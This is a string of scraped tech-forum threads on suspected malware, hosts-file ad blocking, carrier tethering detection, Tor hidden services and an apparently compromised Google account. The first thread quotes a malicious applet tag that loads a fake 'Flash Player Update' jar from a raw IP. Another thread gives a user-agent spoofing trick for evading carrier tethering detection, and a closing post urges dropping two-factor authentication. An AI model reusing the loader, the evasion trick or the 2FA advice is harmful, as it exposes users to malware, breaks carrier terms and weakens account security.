My firefox suddently started opening a popup asking what to do with a "frame.html" file from http://188.126.79.73
after opening the frame.html file here is it`s source:
Code:
<applet width='10' name='Adobe Flash Player Update' height='11' code='FlashPlayer.class' archive='http://188.126.79.73/FlashPlayer.jar'>
I believe this is a virus. EVERY firefox tab I have open produces one of those popups asking if I want to open with or save the frame.html file. If I refresh a tab it produces a new popup of the same type. This is a bad virus, really bad. I don`t have any clues on how to stop it from harassing my firefox. it seems to use some ICAP stuff to blow every firefox tab. I need some help here.
I'd reinstall Firefox and Flash before jumping to any conclusions. It may just be a bug. You could try running a couple of scans to be on the safe side. Malwarebytes and HijackThis will find anything nasty.
already did that, the website which it`s redirecting to download that "update" is not from adobe, so it's a virus... I just don't know how to clean it because it has infected all my firefox.
fscussel said:
already did that, the website which it`s redirecting to download that "update" is not from adobe, so it's a virus... I just don't know how to clean it because it has infected all my firefox.
Click to expand...
Click to collapse
Hello. Have you tried to uninstall and reinstall ff? yes you probably have...
Have you tried a restore point?
imo,humbly, If its as bad as you may think, and no scans are finding it, then you may have to go through your RegKeys and google them to locate anything uncommon.
I hope your wrong about it alltogether though!
good luck
chrisnk1 said:
Hello. Have you tried to uninstall and reinstall ff? yes you probably have...
Have you tried a restore point?
imo,humbly, If its as bad as you may think, and no scans are finding it, then you may have to go through your RegKeys and google them to locate anything uncommon.
I hope your wrong about it alltogether though!
good luck
Click to expand...
Click to collapse
no, I'm not wrong, I have AVIRA antivirus always on and update, I've tried that malware software which was suggested, both don't find anything, but now I just tried to access my router setup and I can't!!!! it says timeout, which is impossible. So what I have found out is that this virus put a layer between firefox and the webadress, like a proxy or something, probably some stuff called ICAP which I don't know what it is... and I don't know how to remove. All my address are being redirected... I get the webpage loaded but with this damn window "applet.html" which is the virus...
idk if you speak about phone or pc..
this will for sure work on pc, ,idk about phone..
find combofix from google..
it is free
be careful about the name as there are counterfeits
it Will fix browser probs where MWB and everything else ive ever seen fail..
after reseting my router everything went back to normal. Is there any virus which infects a router?
B4 doing something potentially damaging to a system...
Do a whois for that ip address. You will see that this ip address is a vpn service. Which means redirects are expected. Now did you install or configure any vpn recently? Try to disable it and see if you still get the popups. relax mate.
Sent from my HTC Desire HD using Tapatalk
lordskid said:
B4 doing something potentially damaging to a system...
Do a whois for that ip address. You will see that this ip address is a vpn service. Which means redirects are expected. Now did you install or configure any vpn recently? Try to disable it and see if you still get the popups. relax mate.
Sent from my HTC Desire HD using Tapatalk
Click to expand...
Click to collapse
if it was a vpn problem it would only happen in my pc, but was happening in every pc in the house. After rebooting the router the problem solved. Which I can only assume that my router was compromised.
Related
I I just recently totally reformatted my hard drive because I thought I had a virus and couldn't find it. But after reinstalling everything and making sure that I didn't have anything I discovered that when I log into XDA and I stay on for some length of time all of a sudden I start getting commercials playing. How do I stop these?
TDubKong said:
I I just recently totally reformatted my hard drive because I thought I had a virus and couldn't find it. But after reinstalling everything and making sure that I didn't have anything I discovered that when I log into XDA and I stay on for some length of time all of a sudden I start getting commercials playing. How do I stop these?
Click to expand...
Click to collapse
Huh, I dont know what you are referring to. Screen shot perhaps? I assume whatever it is, it depends on flash and the easiest way is to disable flash. The browser I use lets you disable it per site or only enable when you click. I assume other browsers have something as an extension.
yareally said:
Huh, I dont know what you are referring to. Screen shot perhaps? I assume whatever it is, it depends on flash and the easiest way is to disable flash. The browser I use lets you disable it per site or only enable when you click. I assume other browsers have something as an extension.
Click to expand...
Click to collapse
I dunno. I never have it happen on any other site. This is the only one. I don't see any ads. Its just audio. I've hunted it down and hunted it down but havent found where it is on here.
TDubKong said:
I dunno. I never have it happen on any other site. This is the only one. I don't see any ads. Its just audio. I've hunted it down and hunted it down but havent found where it is on here.
Click to expand...
Click to collapse
Weird. If you get something like firebug or http headers extensions on firefox, they will let you find out what external links are loading. If you can get me some sort of dump or screen shot, I can tell you what to block in your host file. Chrome has the developers tools that show the same stuff or Opera has Dragonfly, so whichever you use.
Opera though, you can right click on the page → content tab → edit site preferences → turn off plugins. That's what I do at least or disable them on all sites and enable when I need them, just for better security.
Pretty sure the other browsers have flashblock, but last I knew and don't quote me on it, flashblock runs the just for a moment before it shuts off the flash since it's an extension. If the flash happened to be malicious, that could possibly be bad. Just semi off topic, but just something that was true and may still be.
If you don't want to deal with all that, you can use my hosts file that I use on my desktop, it's smaller version of the one I use for mobile thats posted with a script to install/update it in the developer's section of the forum.
http://dl.dropbox.com/u/24904191/hosts-desktop
rename it "hosts" and stick it in C:\Windows\System32\drivers\etc\hosts on windows (must open notepad with admin privilages) or on linux/osx, it goes in /etc/hosts.
I wouldnt normally advocate for blocking ads on xda, but if they have anything that automatically plays audio, that draws the line for me.
TDubKong said:
I dunno. I never have it happen on any other site. This is the only one. I don't see any ads. Its just audio. I've hunted it down and hunted it down but havent found where it is on here.
Click to expand...
Click to collapse
Scroll all the way to the bottom of the page you're on, it's on the right side.
Sent from my 5am5ung SGH-R225
It's just a blank white space for me, but if you add the following line to your host file, you wont see it anymore, since it's one of these:
0.0.0.0 rt.liftdna.com track.netshelter.net cdn.viglink.com
http://forum.xda-developers.com/showthread.php?t=1264778
Will flag again to the admin.
So I did a search and couldn't really find any info on what this is. today I was scanning everything attached to my network with Fing and her phone came up with a TCP 12346 netbus backdoor trojan. Not sure where to go from here to find and remove it. my guess is she got it from using mp3 music downloader. any help is much appreciated.
Anyone????
What did you use to scan it with?
Sent from my ADR6400L using Tapatalk
Turd Furguson said:
What did you use to scan it with?
Sent from my ADR6400L using Tapatalk
Click to expand...
Click to collapse
look out security
Android NetBus backdoor trojan
Bump. I have seen this "12346 NetBus backdoor trojan" during a fing (overlooksoft) service scan. What does xda have to say about this?
Wikipedia gives a interesting article about theNetBus trojan horse.
The person that owns the phone claims that they clicked on a link in an email and the phone froze.
The only solution I have dug up is a factory reset. I did, ran another scan and it didnt change.
Ill be looking for feedback!
same 12346 netbus back Door trojan
Fing app tells me that my Phone has 12346 port open. Any advice? Thanks
For anyone still wondering
I also used Fing and found the same open port and it seems If you use the Rhapsody service then that is your answer if you dont then go fish, best of luck, hope this helps . . . . at least to anyone that uses Rhapsody
I also have Rhapsody/Napster and I also did a scan with the Fing app, and got the same Netbus backdoor trojan in the running services when scanning with Fing. This is totally a guess but if its Napster then it would make sense that the app keeps a port open so it can block the service if your subscription is canceled or suspended. My experience is that if you force Napster into offline mode before its cancelled or suspended it wont block the service because its not actively searching for the network. I have done this with Napster a few times.
Install TWRP and reformat the drive... then re-flash the stock firmware.
Hello everyone, so I recently finally got blocked from tethering by T-Mobile after a long time of sucking it out of them by being rooted and on a custom ROM like all of us here.
The way they know you are tethering on their network is by the User Agent that is sent to them by your desktop/laptop computer browser. When they see that a regular browser is accessing their network, that's when you get the infamous T-Mobile Hotspot Screen we all hate.
I've recently discovered a Firefox Add-On called User Agent Switcher found here: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/?src=search
Download it and install it to Firefox. Then download this (right click, "Save as") http://techpatterns.com/downloads/firefox/useragentswitcher.xml
Go to Tools>User Agent>Edit User Agents (a window pops up) click on "Import.." and add the .xml file you just downloaded.
Then pick a User Agent that resembles the Sensation webkit and BAM! Free tethering for all of us.
I'm using it right now
NOTE: If you use a Googlebot User Agent, you will be able to tether and always load up full webpages instead of mobile versions. - Thanks to The Archangel and chadwick3nser for discovering this!
You can also do the same with chrome.
Been doing it for since the day they released it.
The Archangel said:
You can also do the same with chrome.
Been doing it for since the day they released it.
Click to expand...
Click to collapse
Hell yeah, go Chrome! I've never used it so I wouldn't know
FiddleGoose said:
Hell yeah, go Chrome! I've never used it so I wouldn't know
Click to expand...
Click to collapse
I actually take it one step further an either completely hide my IP on the computer or switch it so they can't try to block it.
Nice!
Is that how att detects also?
Sent from my SAMSUNG-SGH-I747 using xda premium
They detect by sniffing packets an the extra Mac address
The Archangel said:
They detect by sniffing packets an the extra Mac address
Click to expand...
Click to collapse
Damn, AT&T is on point. Bastards.
I hate T-Mobile for pulling that move as well.
FiddleGoose said:
Damn, AT&T is on point. Bastards.
I hate T-Mobile for pulling that move as well.
Click to expand...
Click to collapse
just about every major cell company does the exact same thing to detect it. Maybe different variants but still the same.
I am doing this right now as well, but all the desktop pages are in mobile. I have found the desktop button on the bottom of the youtube site but cant find it on most sites. any workaround for this?
chadwick3nser said:
I am doing this right now as well, but all the desktop pages are in mobile. I have found the desktop button on the bottom of the youtube site but cant find it on most sites. any workaround for this?
Click to expand...
Click to collapse
Use a Google spider UA. Everything will be as normal
The Archangel said:
Use a Google spider UA. Everything will be as normal
Click to expand...
Click to collapse
do i create a custom UA and edit the string to a spider or how would be the best way? or what would be the best one to use?about going about this? sorry, have no experience with user agents
---------- Post added at 05:54 PM ---------- Previous post was at 05:43 PM ----------
nevermind, i used googlebot 2.1 new version and its working great, thanks for this!!!
Glad you got it working.
Hey op. Heres a suggestion, put in the your first post. Use a Google bot user agent. Using that will load all the web mail pages normally.
The Archangel said:
Glad you got it working.
Hey op. Heres a suggestion, put in the your first post. Use a Google bot user agent. Using that will load all the web mail pages normally.
Click to expand...
Click to collapse
You got it!
The Archangel said:
I actually take it one step further an either completely hide my IP on the computer or switch it so they can't try to block it.
Click to expand...
Click to collapse
What are you using to block the IP address? I was thinking just changing the IP to not be the standard DHCP that the phone would give you still shows it coming from another MAC address on the same connection and would be obvious to the write sniffing rules?
I realize this isn't a requirement I've been using the UA for a while from canary but I easily see them stopping this workaround w/ better sniffing rules.
SurfCityCom said:
What are you using to block the IP address? I was thinking just changing the IP to not be the standard DHCP that the phone would give you still shows it coming from another MAC address on the same connection and would be obvious to the write sniffing rules?
I realize this isn't a requirement I've been using the UA for a while from canary but I easily see them stopping this workaround w/ better sniffing rules.
Click to expand...
Click to collapse
i use platnium hide ip. it switches to another ip when im on windows an sometimes ill use smac to change that also. havent found any programs for linux yet (havent really looked)
The Archangel said:
Use a Google spider UA. Everything will be as normal
Click to expand...
Click to collapse
This is a very bad advice as pretending to be a googlebot may get you either blocked or banned from many websites (especially if they use ZBBlock) as this behavior is rated as a spammer/bot activity.
tobitege said:
This is a very bad advice as pretending to be a googlebot may get you either blocked or banned from many websites (especially if they use ZBBlock) as this behavior is rated as a spammer/bot activity.
Click to expand...
Click to collapse
I've been doing it for a while, never got a ban on my end
Okay I've been tethering fine for a while on FF, but T-Mobile finally blocked me yesterday... I figured out that it was the second I started to watch a YouTube video. Guessing they're able to see activity on my cell account at the same time as my login is accessing YouTube and put 2&2 together...? (That may be obvious to some...)
Anyway... I may try the user agent spoofing but this is really aggravating since I'm traveling right now and the internets in my hotel are $10/day.
Sent from my Galaxy S 4G
Anyone figure out how to use netflix while spoofing in Firefox? I've been settling for Amazon Prime instant video, but I'd love to have Netflix back. With the UA spoof, Netflix won't play movies. At least I haven't figured out how.
This method no longer works for me
I start orbot to log onto tor network.. Logs me onto the Tor network, but it refuses to resolve any .onions. Same thing is happening on my nexus7... Im usin cw11 nightly... I know im on tor cause I check to see what my ip is...... but getting to the deep web I get an error:
WARN: Resolve requests to hidden services not allowed.
Failing
Every other site can work... Did I screw up a hosts file or something?
Any help would be appreciated. Thank you
Just want to say I have the exact same problem. Not with Firefox, not with orbot, I can connect tor fine (check.torproject.org says I'm connected), but I can't open any .onion site. It says "name not resolved, or something...
Sent from my Galaxy W using Tapatalk
andrepd said:
Just want to say I have the exact same problem. Not with Firefox, not with orbot, I can connect tor fine (check.torproject.org says I'm connected), but I can't open any .onion site. It says "name not resolved, or something...
Sent from my Galaxy W using Tapatalk
Click to expand...
Click to collapse
Soo.... no one else has been having issues?
I know tis is a bit older post but the problem is still there. I have the same problem with my android 5.0.2 (Lolipop) phone and Orbot. If i check IP its a tor IP. I can reach all normal sites but no onion sites. I searched and searched and tested all kind of Firefox settings suggested but no go. What is going on? Because of this i can't trust Orbot not that i'm planning to do illegal stuff i just want to explorer stuff but if people really need a safe way to go online i wouldn't trust my live on Orbot.
5lut said:
I start orbot to log onto tor network.. Logs me onto the Tor network, but it refuses to resolve any .onions. Same thing is happening on my nexus7... Im usin cw11 nightly... I know im on tor cause I check to see what my ip is...... but getting to the deep web I get an error:
WARN: Resolve requests to hidden services not allowed.
Failing
Every other site can work... Did I screw up a hosts file or something?
Any help would be appreciated. Thank you
Click to expand...
Click to collapse
Are you sure the onion sites are up, and you are typing the url correctly?
delete this
As the title say time I install a new rom or do a factory reset it looks like I've been hacked. As soon as I register and connect my phone to the internet google security activity shows that my phone has been connected from Irland or Germany although I'm connecting from Sweden. How can this be explained if I'm not being hacked? I take all the security measures, changing password etc... But yet this problem doesn't go away. Does this happen to anyone else?
give us more detail
did happen only with one device or more? what do u use for root, wich rom, custom recovery do u install? wich kind of gapps do u use? it happen just when u install the rom/recovery, or when u set up the gapps?
the foreign connection message is inside the gmail account? do u see foreign ip address logged when u are not logged or just foreign ip when u are logged? (this question is because maybe something use a vpn)
I use Viperone rom, but it does't matter what rom I use. As soon as i logg in to my google account it happens, on the google security activity where I can see my devices, it shows that I logged in from Irland or Germany, and after that it goes back to show that I logged in from Sweden. So far I noticed that it only happens on my phone, but in the past it use to happen on my PC too, and it does not show the ip address, it only shows the name of the country. This is how it looks like: http://imgur.com/2A9ZBJy Tyskland is Germany in Swedish and it's not supposed to be there with Irland.
Keomas said:
I use Viperone rom, but it does't matter what rom I use. As soon as i logg in to my google account it happens, on the google security activity where I can see my devices, it shows that I logged in from Irland or Germany, and after that it goes back to show that I logged in from Sweden. So far I noticed that it only happens on my phone, but in the past it use to happen on my PC too, and it does not show the ip address, it only shows the name of the country. This is how it looks like: http://imgur.com/2A9ZBJy Tyskland is Germany in Swedish and it's not supposed to be there with Irland.
Click to expand...
Click to collapse
when u install rom and configure gapps r u using your wifi? because is strange it happens also with your pc, maybe the problem is in your LAN, it happens just after the gapps setup after a fresh install or also later?
do u ose official gapps (and where is the source) or do u use other kind of gapps?
The roms that I use has allready Google apps installed. This time it happened right after I logged in to my phone. In the past it happened a day later.
It's possible that the new rom had it's location history set to those locations.. And Google apps like a good little app is telling where your are...
But it's wrong until it gets a proper location update.
nutpants said:
It's possible that the new rom had it's location history set to those locations.. And Google apps like a good little app is telling where your are...
But it's wrong until it gets a proper location update.
Click to expand...
Click to collapse
No. This happens when i change the password. I changed the password before i installed the new rom.
Google
Yeah sure.google needs update location.
sichuv11 said:
Yeah sure.google needs update location.
Click to expand...
Click to collapse
Nope. I'm definitely being hacked. Everything points towards it. I change my password I format my PC I install the original android to my phone, same **** happens. It was not like this before.
There is a trojan that can not be found by virus, malware and trojan software. This bastard got me. I think it could be the government.
Now it looks like this,I got USA instead of Germay http://imgur.com/uYDxZ1j Am i being hacked or not? 6th februari is the day i changed my password, compare it with the first picture i posted.
make 2 new google account with your pc
wipe your phone and install a rom, than configure it with one new account
use it for a day
than with your pc go in both account and see if are both comprimised or not
Let's assume the worst thing, that I am being hacked. How can I stop this from happening? I already changed password (I'm doing that from time to time), I use 2 step verification and sms verification when I login to my Gmail and I got virus, malware and firewall softwares, what else can I do? How am I being hacked?
Keomas said:
Let's assume the worst thing, that I am being hacked. How can I stop this from happening? I already changed password (I'm doing that from time to time), I use 2 step verification and sms verification when I login to my Gmail and I got virus, malware and firewall softwares, what else can I do? How am I being hacked?
Click to expand...
Click to collapse
if u want help you should try to do what we say and report it
niubboxp said:
if u want help you should try to do what we say and report it
Click to expand...
Click to collapse
Your just asking questions, I don't think you have answers.
Keomas said:
Your just asking questions, I don't think you have answers.
Click to expand...
Click to collapse
and you will never know
niubboxp said:
and you will never know
Click to expand...
Click to collapse
Maybe not on this forum, but there are other forums.
What rom are you using? Where did you get it?
What email app are you using?
Who is your internet provider for your device?
All of these can be factors in you being hacked...
Your rom could have a Trojan on it.
Your email could be not properly storing your password.
(Your not using the factory email app that uses the account your signed info your phone with are you? Please say no)
Is your internet provider known for making a federal case out of every request for information or do they give it out to anyone with a badge?
More information is needed before you can be helped.
First off change roms...
If you are using a oem rom get a custom rom from a popular developer.
Then change email providers
(Unless you are taking Google)
Then dump the two factor crap
Get a third party open source email app or use tor to sign in by web mail.
Change and set your password from a cafe or hotel Wi-Fi that is nowhere where you usually go.
Then see if you think you are being hacked..
If so trash the phone
Get a new one with cash..
Root it secure it
Try again
And if that still looks bad..
User paper and one time pads for encryption and safe drop points.